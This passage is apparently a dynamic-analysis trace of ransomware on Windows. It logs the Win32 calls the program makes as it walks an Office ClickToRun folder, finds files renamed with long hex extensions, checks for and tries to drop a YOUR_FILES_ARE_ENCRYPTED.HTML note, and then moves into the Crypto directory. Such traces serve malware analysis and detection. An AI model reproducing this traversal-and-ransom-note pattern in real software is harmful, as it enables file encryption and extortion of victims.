pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned 190 [0169.635] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.635] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned=".B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00" [0169.635] lstrlenW (lpString=".B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned 65 [0169.635] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb86c2c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76", cAlternateFileName="C2RMAN~1.53C")) returned 1 [0169.635] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned 190 [0169.635] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.635] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.es-es.xml.53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned=".53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76" [0169.635] lstrlenW (lpString=".53CD91DAEED77D0C28DDBD58BE6C1D88E9C3CBAAF4E12C7AA1A196A8D5B6CF76") returned 65 [0169.635] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb892420, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x5fa6, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A", cAlternateFileName="C2RMAN~1.CFB")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned 190 [0169.636] lstrcmpW (lpString1="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.Proof.Culture.msi.16.fr-fr.xml.CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned=".CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A" [0169.636] lstrlenW (lpString=".CFB4B3B14DCD9AC2D031BB88129D214A1C78681E56028B5EF98C3A12B29E1C1A") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb8b8580, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B", cAlternateFileName="C2RMAN~1.CF7")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned 185 [0169.636] lstrcmpW (lpString1="C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml.CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned=".CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B" [0169.636] lstrlenW (lpString=".CF76E52C0DB3C98B8EB16CB26C7DBF88E02A5E1057C1C3BB2E4024FE13C5F15B") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb8de6e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x12d6e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556", cAlternateFileName="C2RMAN~1.6F2")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned 204 [0169.636] lstrcmpW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml.6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned=".6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556" [0169.636] lstrlenW (lpString=".6F2AD093159699B0068772CAA74FC67629DD9ADD72B3842275F1C7C227BF8556") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb904840, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3708, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48", cAlternateFileName="C2RMAN~1.679")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned 189 [0169.636] lstrcmpW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml.679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned=".679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48" [0169.636] lstrlenW (lpString=".679BE06DAA0AAA752C80FEDF12573D0A128AEF98517A40BFCBB31E75ED2FDA48") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb950b00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xaac34, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837", cAlternateFileName="C2RMAN~1.9CC")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned 198 [0169.636] lstrcmpW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.636] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml.9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned=".9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837" [0169.636] lstrlenW (lpString=".9CC8F0D5847AE5EB51A4378421D9B2572D5D4F87D65C3DC68ECC14846E95B837") returned 65 [0169.636] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c34470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c34470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb976c60, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x15286, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569", cAlternateFileName="C2RMAN~1.AD9")) returned 1 [0169.636] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned 194 [0169.636] lstrcmpW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml.AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned=".AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569" [0169.637] lstrlenW (lpString=".AD9E20BCFFF44CBCD8CCAD0D75417AB3309A9AB04CFD0A0041AB7660A2D3C569") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xcb99cdc0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x1301e, dwReserved0=0x0, dwReserved1=0x60, cFileName="C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141", cAlternateFileName="C2RMAN~1.49A")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned 184 [0169.637] lstrcmpW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml.49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned=".49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141" [0169.637] lstrlenW (lpString=".49A6BED2E3D363BEB7EC43EBAFF0C2ED46F42107DBE591B040058F1AD4F40141") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77a3b990, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x0, dwReserved1=0x60, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 97 [0169.637] lstrcmpW (lpString1="integrator.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0169.637] lstrlenW (lpString=".exe") returned 4 [0169.637] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91a13d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91a13d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xcb9c2f20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853", cAlternateFileName="MICROS~1.93D")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned 201 [0169.637] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned=".93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853" [0169.637] lstrlenW (lpString=".93D7B9D0335DF63395A14C45D85D37B43FDA29CD30E71B47412501127D815853") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91126ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91126ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0xca6, dwReserved0=0x0, dwReserved1=0x60, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E", cAlternateFileName="MICROS~1.096")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned 198 [0169.637] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned=".0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E" [0169.637] lstrlenW (lpString=".0967090834C1D346BAE9CA70EEF3F6F1EC53AA5FEEB217FA77F77D6252E2D60E") returned 65 [0169.637] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95bd5cf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x95bd5cf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa8ea310, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0x0, dwReserved1=0x60, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0169.637] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 102 [0169.637] lstrcmpW (lpString1="msoutilstat.etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.637] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0169.638] lstrlenW (lpString=".man") returned 4 [0169.638] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0169.638] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x949fb7f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x949fb7f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac1041d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0x0, dwReserved1=0x60, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0169.638] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 94 [0169.638] lstrcmpW (lpString1="wordEtw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.638] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0169.638] lstrlenW (lpString=".man") returned 4 [0169.638] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0169.638] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb9e9080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.638] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0169.638] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.638] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb9e9080, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.638] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.638] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0169.638] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.638] GetProcessHeap () returned 0x270000 [0169.639] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.639] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0xcb9e9080, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcb9e9080, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0169.639] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.639] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 73 [0169.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.639] GetProcessHeap () returned 0x270000 [0169.640] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.645] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e7177a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcba5b4a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcba5b4a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Crypto", cAlternateFileName="")) returned 1 [0169.645] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned 39 [0169.645] GetProcessHeap () returned 0x270000 [0169.645] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.646] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto" [0169.646] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\*") 